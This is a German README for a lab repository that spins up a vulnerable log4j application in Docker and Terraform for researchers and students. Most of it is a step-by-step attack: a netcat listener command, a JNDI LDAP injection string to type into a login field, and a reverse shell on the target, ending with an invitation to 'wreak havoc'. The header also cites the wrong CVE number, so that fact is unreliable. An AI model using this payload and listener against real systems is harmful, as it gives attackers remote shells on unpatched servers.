
Terraform- und Docker-Ressourcen zum schnellen Aufsetzen eines Tests für CVE-2021-44428
Dieses Repository ist eingerichtet, um die log4j-Schwachstelle schnell mit Docker und Hashicorp Terraform zu testen. Alle Komponenten dieses Tests laufen in Docker-Containern im Docker-Netzwerk und sind über 'host.docker.internal' erreichbar.
Diese Testumgebung basiert auf einem großartigen Blogbeitrag von Raxis: (https://raxis.com/blog/log4j-exploit)
Die verwundbare Anwendung und der Exploit-Code stammen von cyberxml (https://github.com/cyberxml/log4j-poc).
Alles, was ich getan habe, ist, die Umgebung zu kodifizieren, um diesen köstlichen Exploit einfach hochzufahren und zu testen.
Ich übernehme keinerlei Verantwortung für nachteilige Auswirkungen oder böswillige Handlungen, die aus der Nutzung des Materials in diesem Repository resultieren können. Punkt. Es liegt an dir zu entscheiden, ob diese Materialien vertrauenswürdig sind, und es ist ebenso deine Verantwortung, diese Informationen ethisch zu nutzen. Ich poste diese Goodies lediglich, damit Forscher, Studenten und Sicherheitsexperten schnell eine Umgebung erstellen und den Exploit selbst testen können. Seacrest out.
Öffne eine Shell im log4j_netcat-Container mit 'docker exec -it netcat /bin/bash' oder etwas Ähnlichem. Hier empfängst du deine Shell-Verbindung zum Opfer-Server, sobald sie hergestellt ist.
Gib in deiner Sitzung im log4j_netcat-Container den folgenden Befehl ein, um den Listener zu starten:
nc -lv -s 0.0.0.0 -p 9001
Navigiere in deinem Browser zu http://host.docker.internal:8080/log4shell/
Gib Folgendes in das Feld 'Username' ein, zusammen mit allem, was du möchtest, im Feld 'Password':
${jndi:ldap://host.docker.internal:1389/a}
Kehre zur Shell des log4j_netcat-Containers zurück und stelle fest, dass du dich mit dem Opfer-Server verbunden hast.
Geh hin und richte Chaos an!